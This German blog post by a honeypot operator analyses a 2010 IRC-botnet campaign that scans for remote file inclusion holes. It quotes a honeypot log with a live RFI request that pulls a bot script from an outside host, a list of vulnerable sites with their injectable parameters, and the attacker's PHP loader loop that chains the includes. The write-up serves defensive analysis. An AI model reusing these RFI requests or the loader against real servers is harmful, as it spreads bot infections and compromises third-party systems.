IRC c&c Server

Datum: 17.Mai.2010

Ich denke ich muss nicht näher beschreiben was ein IRC basiertes Botnetz ist.

Unser neuer Freund 

####################################################

##[                                              ]##

##[              casper_kae@yahoo.com            ]##

##[           Created by Kiss_Me or Alert        ]##

##[                 Thanks to mama               ]##

##[           Casper_Cell Parijatah srono        ]##

##[                                              ]##

####################################################
Mein neuer Freund hat heute, so gegen 14Uhr angefangen, massiv im Internet zu scannen nach RFI (remote files inclusion) Lücken.
Dies ist natürlich nicht unentdeckt geblieben und meine Honeypots haben eine hohe Aktivität gezeigt.
Hier ein kleiner Ausschnitt aus meinen Honeypot logs:

---
Got GET request: //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://food114.tv//a_mode/count/bot.txt??? Included URL: http://food114.tv//a_mode/count/bot.txt 4 active threads.
---
Hier kannst du dir 100 Zeilen aus meinen Honeypot Logs ansehen: Logs


Auffälligkeiten unseres Angreifers

Wir man aus den Logfiles entnehmen kann ist vermehrt die URL "hXXp://food114.tv//a_mode/count/load.txt???" (falls offline hier klicken) versucht worden zu includieren.

Schauen wir mal ein wenig genauer hin und erkennen, dass diese Form von RFI interessant ist:


Angreifbare URLs

set_time_limit(0);
$keluar=0;
$asl=array(
"http://www.7e.com.tw//appserv/main.php?appserv_root=",
"http://www.wongtawandkt.co.cc//?mosConfig_absolute_path=",
"http://www.wongtawandkt.co.cc//?mosConfig_absolute_path=",
"http://www.youngjudaea.org//?_PHPLIB[libdir]=",
)

Hier wurde gute Vorarbeit geleistet, warscheinlich wurden die URL's von vorhergegangenen RFI-Scans gesammelt und hier in ein array gesteckt. Dank des Scanns wurden auch die Dorks mitgeliefert, in die man direkt seine php-shell einbinden kann. Doch dies würde mein IP ja sofort verraten, wenn ich diesen Aufruf absetze. Die meisten Kiddies würden sich jetzt freuen und anfangen mit einem RFI-Includer ihre eigenen Shells zu includen.


Doch was hat sich unser Freund "casper_kae" gedacht als er die "load.txt" geschrieben/kopiert hat?

hellQ=array(
              "hXXp://food114.tv//a_mode/count/load.txt???",
              "hXXp://food114.tv//a_mode/count/casper.txt???",
              "hXXp://food114.tv//a_mode/count/load.txt???",
              "hXXp://food114.tv//a_mode/count/bot.txt???",
              "hXXp://food114.tv//a_mode/count/load.txt???",
              "hXXp://food114.tv//a_mode/count/bot.txt???",
              "hXXp://food114.tv//a_mode/count/load.txt???"
          );

Er baut/kopiert sich erstmal wieder ein array mit möglichen Shells/IRC-Bots/etc.Was er damit vor hat, dazu komme ich gleich. Dies ist keine schlechte Idee ein array zu bauen mit diverser Malware um sicherzustellen, dass eine davon auch beim includen online ist. 

do {
$aslo=$asl[rand(0,count($asl) - 1)];
$shlo=$shellQ[rand(0,count($shellQ) - 1)];

$loadergue = fopen ($aslo.$shlo, "rb");
$loaderasl = fopen ($aslo.$shlo, "rb");
$aslo=$asl[rand(0,count($asl) - 1)];
$shlo=$shellQ[rand(0,count($shellQ) - 1)];

$loadergue = fopen ($aslo.$shlo, "rb");
$loaderasl = fopen ($aslo.$shlo, "rb");
$aslo=$asl[rand(0,count($asl) - 1)];
$shlo=$shellQ[rand(0,count($shellQ) - 1)];

$loadergue = fopen ($aslo.$shlo, "rb");
$loaderasl = fopen ($aslo.$shlo, "rb");

} while ($keluar==0);

Voodoo

Hier findet das eigentliche includen statt, dass Script nimmt sich eine URL aus dem $asl array und includiert eine Shell aus dem $hellQ array.

Das wirklich wichtige ist, dass der Hacker es nur bei einem Opfer includieren muss. Das Opfer dann seinerseits führt, ohne es zu wissen, alle anderen includes aus, die oben in dem Array stehen.


Nach dem Voodoo, was dann?

Nach dem er erfolgreich die includes durchführen lassen hat, starten die "IRC basierten Bots" und verbinden sich mit dem "Command and Control" (c&c) Server seiner Wahl.

Es ist nicht ausgeschlossen, dass Dein Server oder Computer auch infiziert ist, daher habe ich Euch hier eine Liste der IP Adressen zur Verfügung gestellt.

Woher habe ich diese Infos?

Durch meinen Job und meine Leidenschaft zur Internet Sicherheit habe ich diverse Methoden entwickelt IRC-Botnetze zu monitoren. Das bedeutet, ich versuche mich getarnet als "angegriffener" Server auf dem C&C Sever so lange wie möglich aufzuhalten um die gehackten Server mitzuloggen die sich verbinden.

Wie kannst du mich erreichen, falls noch Fragen offen sind?

Am besten über die About Me Seite. Dort findest du auch eine E-Mail Adresse unter der du mich erreichen kannst. Ansonsten bin ich auch im IRC unter irc://irc.freenode.net#glastopf zu erreichen.